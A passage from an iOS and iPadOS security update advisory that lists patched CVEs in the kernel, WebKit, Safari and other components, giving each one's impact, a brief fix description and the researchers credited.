Description: A race condition was addressed with improved state handling.

CVE-2022-42864: Tommy Muir (@Muirey03)

**IOMobileFrameBuffer**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: An out-of-bounds write issue was addressed with improved input validation.

CVE-2022-46690: John Aakerblom (@jaakerblom)

**iTunes Store**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause unexpected app termination or arbitrary code execution

Description: An issue existed in the parsing of URLs. This issue was addressed with improved input validation.

CVE-2022-42837: Weijia Dai (@dwj1210) of Momo Security

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A race condition was addressed with additional validation.

CVE-2022-46689: Ian Beer of Google Project Zero

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Connecting to a malicious NFS server may lead to arbitrary code execution with kernel privileges

Description: The issue was addressed with improved bounds checks.

CVE-2022-46701: Felix Poulin-Belanger

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A remote user may be able to cause kernel code execution

Description: The issue was addressed with improved memory handling.

CVE-2022-42842: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: This issue was addressed with improved checks.

CVE-2022-42861: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to break out of its sandbox

Description: The issue was addressed with improved memory handling.

CVE-2022-42844: pattern-f (@pattern\_F\_) of Ant Security Light-Year Lab

**Kernel**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app with root privileges may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42845: Adam Doupé of ASU SEFCOM

**Photos**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Shake-to-undo may allow a deleted photo to be re-surfaced without authentication

Description: The issue was addressed with improved bounds checks.

CVE-2022-32943: an anonymous researcher

**ppp**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2022-42840: an anonymous researcher

**Preferences**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to use arbitrary entitlements

Description: A logic issue was addressed with improved state management.

CVE-2022-42855: Ivan Fratric of Google Project Zero

**Printing**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to bypass Privacy preferences

Description: This issue was addressed by removing the vulnerable code.

CVE-2022-42862: Mickey Jin (@patch1t)

**Safari**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Visiting a website that frames malicious content may lead to UI spoofing

Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.

CVE-2022-46695: KirtiKumar Anandrao Ramchandani

**Software Update**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: A user may be able to elevate privileges

Description: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.

CVE-2022-42849: Mickey Jin (@patch1t)

**Weather**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2022-42866: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A use after free issue was addressed with improved memory management.

WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory consumption issue was addressed with improved memory handling.

WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may bypass Same Origin Policy

Description: A logic issue was addressed with improved state management.

WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may result in the disclosure of process memory

Description: The issue was addressed with improved memory handling.

CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day Initiative

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved input validation.

WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security

WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may disclose sensitive user information

Description: A logic issue was addressed with improved checks.

CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs & DNSLab, Korea Univ.

**WebKit**

Available for: iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later

Impact: Processing maliciously crafted web content may lead to arbitrary code execution

Description: A memory corruption issue was addressed with improved state management.

WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security

WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

Tag

#webkit